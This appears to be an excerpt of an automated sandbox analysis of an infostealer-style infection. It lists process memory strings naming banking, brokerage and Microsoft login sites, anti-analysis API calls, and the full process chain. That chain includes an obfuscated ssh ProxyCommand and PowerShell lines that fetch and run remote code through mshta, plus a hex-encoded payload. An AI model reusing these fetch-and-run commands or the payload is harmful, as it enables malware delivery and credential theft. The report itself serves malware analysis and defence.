Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: AutoIt3.exe, 00000010.00000003.2425868153.000000000102F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: InstallUtil.exe, 0000000D.00000002.4521990116.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTrus
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: ssh.exe, 00000000.00000002.2310011759.000002B659089000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286266487.00000186D0B1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: mshta.exe, 00000005.00000003.2306370988.000001965B5B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2306996383.000001965B5B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2294457547.000001965B5AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP'`[
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: powershell.exe, 00000007.00000002.2286266487.00000186D0B28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: svchost.exe, 00000006.00000002.3766781304.0000019B5362B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_01340E2F LdrInitializeThunk,

11_2_01340E2F

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004D45D5 BlockInput,

11_2_004D45D5

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_00475240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_00475240

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_00495CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

11_2_00495CAC

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004DC6D9 LoadLibraryA,GetProcAddress,

11_2_004DC6D9

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_01346B12 mov eax, dword ptr fs:[00000030h]	11_2_01346B12
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_01346B12 mov eax, dword ptr fs:[00000030h]	11_2_01346B12
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_01346B19 mov eax, dword ptr fs:[00000030h]	11_2_01346B19
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_01346B19 mov eax, dword ptr fs:[00000030h]	11_2_01346B19
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_01340C2D mov eax, dword ptr fs:[00000030h]	11_2_01340C2D
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_01352A86 mov eax, dword ptr fs:[00000030h]	11_2_01352A86
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_017772F6 mov eax, dword ptr fs:[00000030h]	14_2_017772F6
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_0176B382 mov eax, dword ptr fs:[00000030h]	14_2_0176B382
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_0176B382 mov eax, dword ptr fs:[00000030h]	14_2_0176B382
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_0176B389 mov eax, dword ptr fs:[00000030h]	14_2_0176B389
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_0176B389 mov eax, dword ptr fs:[00000030h]	14_2_0176B389
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_0176549D mov eax, dword ptr fs:[00000030h]	14_2_0176549D

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004B88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

11_2_004B88CD

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0048A354 SetUnhandledExceptionFilter,	11_2_0048A354
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0048A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0048A385
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009AA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_009AA385
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009AA354 SetUnhandledExceptionFilter,	14_2_009AA354

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004B9369 LogonUserW,

11_2_004B9369

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_00475240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_00475240

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004C1AC6 SendInput,keybd_event,

11_2_004C1AC6

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004C51E2 mouse_event,

11_2_004C51E2

Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\47891652\updater.exe "C:\Users\user\AppData\Local\Temp\47891652\updater.exe" C:\Users\user\AppData\Local\Temp\47891652\bovZdOEN.bin	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" .
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function xmcki($txxjw){return -split ($txxjw -replace '..', '0x$& ')};$lwtkb = xmcki('a91aeef14d627b7faff488dbccfe43edd74c8ec41df4afdae86a2cacd63d2618e776ab95b16be51714d0c93388447c10995b802510da96a4bf1b9a934093f8ea670fe6b480a54ab53be4b52fc1abdd0b2f9a47d5fd8ec0b5565cf6e0d5aaa18330404f1bab02271e1f4adb91da26835fbd6f294448368ae11c958f79f412c62c2b5b5ed8bc591ce31107db0b96407294783a633b181b6ccfc9827e4078d2d612aecf34e25c3732da701d97a8d605ea1a7c739adf164e68bd11e6acec79c72bedba160c18420a5db1d9810bd0b1fe135f640f78fec268a192784340b9c69305f19e92cf4f0ef596571f8839c8acf651d0ba0ee2d7ec50e13be537e55036bc27049b63d09ca27c81001319e386cf456f2175699371cad7a1a9f6165c7c5452bca976318223f68e182ddfa4a6a6e0d3a37b3ff3d396a65b4465c3cc0736702e834f0baaae20f6b4e273e97bd27bf14dab30e834ec586fa7feb119497e06f166f11571bd5761f27fc24fd517f4f7b7d12d7114efc8db1e29aa9687ac4bc2a6b4bdd893e35941dac5f77f86582f2f16a448f88f4807cb645fdc4426ff6a2a211758433846d104900f052f81898303fb3e54b3f463b628b3140a4bbd84f9e5b31e891ed77433a9b65bd1c0fea1c06740e0bc212bc132161654e200851a5da2bb192042e792908ea1f9c6eb7eee004e8e047c0a08e66e6d9b8e7bcb944609f5b020cc1479272b40a2d304ac191e6c492064720abe984d0f4cf077c873c863d03924997c8e4e627c7811bf2ebd9b06da61c1c0b04e7ea2f2cabb41143da53e8f7300f859ae1cfdf9875e0dfeebd0ff7229b35b1646f5b57816308ad9d62c6ca75d45bd15c1a2b4da51922caa8e46ac5b09df7821207379a305101f22ea2f6bb40dba589322a506d5ad46da486cf86f662522d165f38590072f1accf13a612369b433b00e300cfd06068817a53c68187347c9ad251d6f1f333877bad8577c4ab84ba78f81483cbcb6bdb1e8fe6a5233fdfff6cc9928404b2e11cfc58e38822138c47f68d6a48778e95f28d8f25c5f1a20d5a198b64b2f05536c7ea824ff816bf184fea692844badf041a46dc4e6a197bda3855b32c46f4b393d58d5d4c7bfbcf82beb6990bb2069da637871dbfb368f1c0e6c0f2a72676ccf3b7fa358c5e09f7e9a8f481775a2d9117cf07d2ed2895d11a6b79e3ce80bd9091e7cc6fcfc76786b1a9a48950c7262c0e9607a4c88c23f16b1cd72267a4445314586554ed8498e02e1556e66e550678d68d2a7dbdbc94565dfee58566dce466d06c87acd0517e92543d88380a92238e86864e5f75c12798c8828272b20a02c40b6b317f309f4d0c660c1d640def366d59f6e605ca9cea69b14214c5d03df39fc5d74b79c43d775d114603d2c9be7f3d35d5f2c62881528c7674e5f58b568c6356fc1470bd70b46364f0545eff33ffc0f3a9487f46e68a23603bcf5a004a1e550eb57c6e96b9828cb4973dbfcb8d62afd7390e01d13cc7760093f91b2f0c22d85e18d540e5cbff1d1a2466bdd39b1846617923d9c4b65a96df2e6fca65713714d212f0f1e8a005b0154fbd7266ba5500e44b40ddfc0174ec740d8ce82ec79b28e9071c42d33693277f784c16744c61bab31bef511d797c50afce5b6f0157f4b0b8f8201dbcafa5813f3156ecfb13519109ff3673aefc6e65c7966d8afa03a8d9d665bf954962cc128461d04e92bbc3e9acd8ca2b7120bf07f55a8ee5e4b6f185e1266c8eddd2ee3761605723cf877a93883b9f459f8231af5ff827049dd16cbcfa02de3abb97da37d487474f6d66efaf3d7d75cf686bd09c2d72bbea469800332fe98aa37baac82515b23041cb7d36849f05ac76ed6cf4e5deeab16e7ffa53e4b56f7ecc66091d6b1dfaf76d3c264e80e69b82674685bf8a742080384ca722b401e88f71676753c5f86d718994e638562e8b5a9b07
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function xmcki($txxjw){return -split ($txxjw -replace '..', '0x$& ')};$lwtkb = xmcki('a91aeef14d627b7faff488dbccfe43edd74c8ec41df4afdae86a2cacd63d2618e776ab95b16be51714d0c93388447c10995b802510da96a4bf1b9a934093f8ea670fe6b480a54ab53be4b52fc1abdd0b2f9a47d5fd8ec0b5565cf6e0d5aaa18330404f1bab02271e1f4adb91da26835fbd6f294448368ae11c958f79f412c62c2b5b5ed8bc591ce31107db0b96407294783a633b181b6ccfc9827e4078d2d612aecf34e25c3732da701d97a8d605ea1a7c739adf164e68bd11e6acec79c72bedba160c18420a5db1d9810bd0b1fe135f640f78fec268a192784340b9c69305f19e92cf4f0ef596571f8839c8acf651d0ba0ee2d7ec50e13be537e55036bc27049b63d09ca27c81001319e386cf456f2175699371cad7a1a9f6165c7c5452bca976318223f68e182ddfa4a6a6e0d3a37b3ff3d396a65b4465c3cc0736702e834f0baaae20f6b4e273e97bd27bf14dab30e834ec586fa7feb119497e06f166f11571bd5761f27fc24fd517f4f7b7d12d7114efc8db1e29aa9687ac4bc2a6b4bdd893e35941dac5f77f86582f2f16a448f88f4807cb645fdc4426ff6a2a211758433846d104900f052f81898303fb3e54b3f463b628b3140a4bbd84f9e5b31e891ed77433a9b65bd1c0fea1c06740e0bc212bc132161654e200851a5da2bb192042e792908ea1f9c6eb7eee004e8e047c0a08e66e6d9b8e7bcb944609f5b020cc1479272b40a2d304ac191e6c492064720abe984d0f4cf077c873c863d03924997c8e4e627c7811bf2ebd9b06da61c1c0b04e7ea2f2cabb41143da53e8f7300f859ae1cfd